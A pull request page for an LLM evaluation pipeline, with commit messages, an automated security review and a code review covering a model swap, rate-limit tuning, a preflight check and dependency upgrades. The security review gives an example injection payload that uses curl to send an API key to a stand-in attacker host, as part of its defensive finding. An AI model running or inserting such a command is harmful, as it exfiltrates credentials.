feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158
feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158
Conversation
Drop concurrency to 1 and add 5s delay between requests for the gpt-5.4 provider to stay within OpenAI rate limits. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The provider was set to openai:gpt-5 which doesn't exist, causing 429s. Restore concurrency to 5 with a small delay since the account has 5,000 RPM. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Concurrency 5 still hits 429s despite 5,000 RPM limit — promptfoo's burst pattern overwhelms the rate limiter. Serial execution with 500ms delay should be reliable. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Add preflight check that makes a single API call before launching 202 eval requests, catching billing/credit issues immediately instead of retrying for hours - Add --allow-net to deno task for the preflight fetch call - Override axios (>=1.15.0) and basic-ftp (>=5.2.1) to fix critical SSRF and command injection vulnerabilities in promptfoo dependencies Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
There was a problem hiding this comment.
CI Security Review
Critical / High
None.
Medium
-
.github/workflows/multi-model-eval.yml:36— Expression injection inworkflow_dispatchinput (pre-existing, not introduced by this PR)MODELS="${{ github.event.inputs.models || 'all' }}"interpolates themodelsinput directly into arun:block. A repo collaborator could supply a value like$(curl attacker.com/?k=$ANTHROPIC_API_KEY)via the workflow dispatch UI, and the shell would execute the command substitution.- Mitigating factor:
workflow_dispatchcan only be triggered by users with write access to the repository, who already have access to repo secrets. Practical exploitability is low. - Fix: Pass the input via an environment variable instead:
(Note:
env: MODELS_INPUT: ${{ github.event.inputs.models || 'all' }} run: | if [ "$MODELS_INPUT" = "all" ] || echo ",$MODELS_INPUT," | grep -q ",${{ matrix.model }},"; then
matrix.modelis safe since it comes from the hardcoded matrix definition.)
-
.github/workflows/multi-model-eval.yml:49—denoland/setup-deno@v2not pinned to SHA (pre-existing)- Per supply chain best practices, third-party actions should be pinned to a full commit SHA. A tag can be moved to point to different code.
- Mitigating factor:
denolandis the official Deno publisher and is generally trusted. The job only hascontents: readpermissions, limiting blast radius.
Low
None.
Verdict
PASS — The actual changes in this PR are security-neutral: updating a model name (gpt-4.1 → gpt-5.4), reducing concurrency, adding a preflight API check, adding functionCall response format handling in eval assertions, and gitignoring a generated config file. No new security issues are introduced. The two medium findings are pre-existing.
There was a problem hiding this comment.
Code Review
Blocking Issues
None.
Suggestions
-
Stale doc comment in
generate_config.ts:28— The usage comment still referencesgpt-4.1:* Supported model aliases: sonnet, opus, gpt-4.1, gemini-2.5-proShould be updated to
gpt-5.4. -
Unscoped
--allow-netindeno.json— The other tasks scope their network permissions (e.g.,--allow-net=api.osv.dev). Since only the preflightfetch()call needs Deno network access (subprocesses likenpm/npxbypass Deno permissions), this could be scoped to--allow-net=api.anthropic.com,api.openai.com,generativelanguage.googleapis.comfor defense-in-depth. Low priority since this is a dev/CI-only task. -
buildPreflightRequestis unit-testable — It's a pure function mapping model names to request configs. There's no existing test convention inscripts/, so this is just a nice-to-have observation for future hardening.
Overall
Clean PR. The preflight check with AbortSignal.timeout(15_000) is good practice and follows the project's "no fire-and-forget promises" convention. The Gemini functionCall?.name fix correctly handles Google's tool-call response format. Security dependency overrides for axios SSRF and basic-ftp command injection are appropriate. Removing the generated 3K-line YAML from version control and gitignoring it is good hygiene.
Bump promptfoo from 0.121.3 → 0.121.4 and regenerate the lockfile. The new release naturally pulls patched versions of every transitive dep that was previously pinned via an override, so the entire `overrides` block can go. Clears 4 open Dependabot alerts against `evals/promptfoo/package-lock.json`: | # | Package | GHSA | Severity | |---|---|---|---| | 11 | mathjs | GHSA-jvff-x2qm-6286 | high | | 10 | basic-ftp | GHSA-6v7q-wjvx-w8wg | high | | 9 | axios | GHSA-3p68-rc4w-qgx5 | critical | | 8 | basic-ftp | GHSA-chqc-8p9q-pq6q | high | Root cause: #1158 added `axios` and `basic-ftp` overrides but the lockfile was never regenerated, so the committed lockfile still had `axios@1.14.0` and `basic-ftp@5.2.0`. The `basic-ftp: >=5.2.1` range also still allowed the vulnerable 5.2.1 per alert #10, and there was no override at all for mathjs. Resolved versions in the regenerated lockfile: | Package | Was | Now | |---|---|---| | @anthropic-ai/sdk | 0.81.0 | 0.82.0 | | axios | 1.14.0 | 1.15.0 | | basic-ftp | 5.2.0 | 5.2.2 | | mathjs | 15.1.1 | 15.2.0 | | hono | 4.12.12 | 4.12.12 | | @hono/node-server | 1.19.13 | 1.19.13 | No nested/duplicate copies of axios, basic-ftp, or mathjs remain in the lockfile. Verification: - `npm audit` → 0 vulnerabilities - `deno run scripts/audit_deps.ts` → "No known vulnerabilities found" (scanned 1064 packages across deno.lock + promptfoo lockfile) - `deno fmt --check`, `deno lint`, `deno check` — clean No code changes required. The eval entry script calls `npx promptfoo eval` — a stable CLI surface — and a patch bump (0.121.3 → 0.121.4) is not expected to change it. Engine requirement unchanged (`^20.20.0 || >=22.22.0`); CI uses Node 24. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Summary
openai:gpt-5.4)functionCallresponse format (was causing 36% pass rate → 93% after fix)promptfooconfig.yaml— it's regenerated every eval run--allow-netto deno task for preflight fetch callLocal test results:
Test plan
npm auditshows 0 vulnerabilities after overrides🤖 Generated with Claude Code